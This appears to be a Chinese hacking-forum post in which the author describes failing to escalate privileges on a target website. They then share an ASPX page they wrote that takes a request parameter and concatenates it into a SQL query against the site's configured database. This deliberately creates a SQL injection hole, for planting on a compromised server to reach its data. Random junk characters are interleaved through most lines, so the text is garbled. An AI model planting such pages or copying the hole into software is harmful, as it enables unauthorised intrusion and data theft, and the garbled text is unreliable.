昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。! L+ M1 t1 e* C+ i7 ]1 @! ?% U7 [
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。( e+ U1 D3 i' {* U2 Y8 P1 f
代码量不多,自己写个拉倒了。烦死了。
& i# _1 H+ y4 U
1 J- U7 l9 F2 C6 O! B, R# g. H# q, D9 `3 c: |# w) o
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
' v' g4 s* u P, q<html xmlns="http://www.w3.org/1999/xhtml"># p) J8 i- k1 M6 ?3 L
<head runat="server">
; D3 z2 q1 R+ ^1 s6 ]& V; X7 @/ B6 x <title>暗影aspx构造注射专用页面</title>5 h+ A4 ~ M' ]' n- C
</head> Y- h C" n8 [) p# p% V
<body>
0 \" j, `0 }- S. ]) j7 W <form id="form1" runat="server">
( N' ]- {9 t6 _( Q <div>
+ [+ T% K4 f" G, { <script language="c#" runat="server">! j; K4 Y, _9 T3 e
1 B: \ @! E- R2 G& I0 _+ k: b6 _: G void page_init(object sender, EventArgs e)
5 x5 q; _- u1 S- h9 i5 z {
$ B& R) }1 N/ ^9 S
7 V. c* f/ v5 ~ System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();) q+ n; Y$ h) o+ c4 n9 P
8 ^) J" j% Q; G8 K8 g
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
- y" }, U, X' M& F conn.Open();
& b' @5 u" O/ z! C : w3 U5 o2 X% S+ x
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=15 ^3 W5 d* j3 d. a, l6 E$ Y2 L
; b0 B5 n/ I8 M% O/ C/ d8 R; L, b) h
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);3 N! H# N7 w# `3 p# a2 m* |0 [
int x = command.ExecuteNonQuery();
3 w" z$ ]2 H+ d; q/ D' A9 v Response.Write(i+"\n");
! p j) u, \- e/ {& | Response.Write(x);
, V( K6 R( Y" E/ x& m, w' b. a conn.Close();
+ x& ]! M0 E5 s8 N) P }5 c2 C: K# ^+ d
1 [ ?+ a7 M. G9 F9 c, A; C0 i </script>
# I& K, a0 I4 A1 T+ A+ z2 N& e </div>
9 R% Q" k8 \2 R0 _+ } </form>- A. B4 A( w2 i8 X+ a
</body>5 {- x/ M0 {- a, n4 Y3 n
</html>
$ d. @7 z2 |( _8 j6 o/ y7 ? |